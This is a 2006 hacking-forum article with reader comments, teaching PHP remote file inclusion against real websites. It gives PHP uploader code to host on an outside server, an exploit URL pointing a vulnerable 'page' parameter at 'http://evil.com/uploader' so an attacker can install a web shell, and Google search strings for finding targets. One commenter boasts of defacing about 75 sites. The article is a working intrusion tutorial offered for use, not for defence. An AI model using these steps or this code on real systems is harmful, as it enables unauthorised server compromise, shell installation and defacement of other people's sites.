Follow us on Twitter!
Never in the field of human conflict was so much owed by so many to so few. - Winston Churchill
Wednesday, April 16, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 77
Guests Online: 76
Members Online: 1

Registered Members: 82803
Newest Member: Tired_of_being_ignorant
Latest Articles

Include Exploits

Arrow Image Old but very effective technique to gaining to a web server



In this article I will teach you the basics of Include Exploits. If you understand php then this will help, although not much.

When a site uses one page to call all the others around a basic template, they can become subject to exploitation under certain circumstances.

e.g. http://www.abc.com/index.php?page=news

To test if its vulnerable, try changing it to abc or whatever

e.g. http://www.abc.com/index.php?page=abc

If its vulnerable you should get an error like this:

Warning: main(abc.php): failed to open stream: No such file or directory in /home/dir/public_html/index.php on line 01

Ok, now we are in business. We now know that the script takes $_GET['page'] and adds .php, then includes it.

e.g.
$page = $_GET ['page'] . ".php";
include ($page);

So, what we need now is an uploader to allow us to upload files on to there server. Here's some dazzling code written by cheesy himself:

<?php

if ( $userfile )
{
@$res=copy($userfile,"$userfile_name");
if ( !$res ){
print "Upload failed! \n";
}else{
print "Upload of $userfile_name successful \n";
}
}
?>

<FORM method=POST ENCTYPE="multipart/form-data">
File to Upload
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="5000000">
<INPUT NAME="userfile" TYPE="file" size=35>
<INPUT TYPE="submit">
</FORM>
</HTML>

So, we need to host this code on a server that doesnt support php or just edit your htaccess so your server treats it as html or whatever. A good, simple free host that doesnt support php and is quick, easy and anonymous is cjb.net

So to exploit the page simply add your url for the uploader script:

e.g. http://www.abc.com/index.php?page=http://evil.com/uploader

Remember if the site adds .php only the page variable be sure to leave it off. Then the uploader pops up and you can install webadmin or a web-based shell.

To find vulnerable sites, we can use our best friend, google. Good searches include:

inurl:"index.php?page=downloads"
inurl:"index.php?page=news.php"

Be imaginative :)

Thanks for reading and i hope you've learnt something new.

Will.

Comments

godon March 25 2006 - 20:09:26
nice nice B) i liked it
Pepeon March 25 2006 - 20:30:06
Good article. I always get "upload failed n" though.
willeHon March 25 2006 - 21:00:44
Thats because the index.php file your exploiting doesnt have the permissions i think. Try making a script using fopen instead.
BluMooseon March 25 2006 - 22:58:01
Great article, nicely explained Smile
thousandtooneon March 26 2006 - 05:15:13
What article did you base this off of? I'm not accusing you of anything, just wondering if you were had read the article I posted to Rohitab and HTS a while back.
superpimpon March 26 2006 - 11:46:45
awesome article Grin
willeHon March 26 2006 - 13:17:56
thousandtoone i based it on sheer experience, i havent read your article and apologise if you feel ive copied you. Ive never even heard of 'Rohitab' and have only ever been on HTS once. Was your article similar to mine?
thousandtooneon March 26 2006 - 20:20:21
WilleH, figured that was the case. Generally people don't try to reinvent the wheel so I thought you might've read this somewhere in the past. This article I wrote was one of my first major attempts at defacing.. Between this and finding two of my own vulnerabilities in PHP-Nuke, I must've defaced close to 75 websites in one weekend. http://www.hackthissite.org/articles/read/285/2/30
thousandtooneon March 26 2006 - 20:22:25
You talk more about uploads whereas I discuss shell commands and general fopen attacks, but nonethess you can see where I imagined you might've seen my article. Fun stuff and good article!
the_flashon March 27 2006 - 16:41:17
This is one of the best article i've come accross on this site. Congrats! Smile
wolfmankurdon March 27 2006 - 17:17:14
It sounds like an article on hts but is completly different
superpimpon March 27 2006 - 18:53:41
there is one problem... most websites use it like this: <?php $page=$_get['page']; $page_include="include/".$page; include($page_include); ?> basicly, this means that if you use this exploit it will include include/http://evil.com/uploader.php instead of http://evil.com/uploader.php, so the file won't be found Sad
willeHon March 27 2006 - 21:36:51
most websites dont.
z3roon March 27 2006 - 22:54:48
nice article
superpimpon March 28 2006 - 19:33:04
@ willeH: example?
superpimpon March 28 2006 - 20:12:22
Well, I found one. It's not to break down your article, its very good. Just said not much sites used it like that...
willeHon March 29 2006 - 13:48:31
Exactly, or else no site would be safe.
willeHon March 29 2006 - 13:49:25
And, im not going to give you an example because no doubt it would get around and the server would get raped.
SwiftNomadon June 25 2006 - 21:13:00
this was def. worth the read!
netfishon February 02 2007 - 03:50:20
SkareCrow wrote a similar article, for those who still don't get it: http://www.hellbo. . .cle_id=612
sam207on September 26 2008 - 11:26:31
"inurl:.php?page=" is the good dork to use I think.. Its nice article though I don't feel its awesome.. Very Good I choose..
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.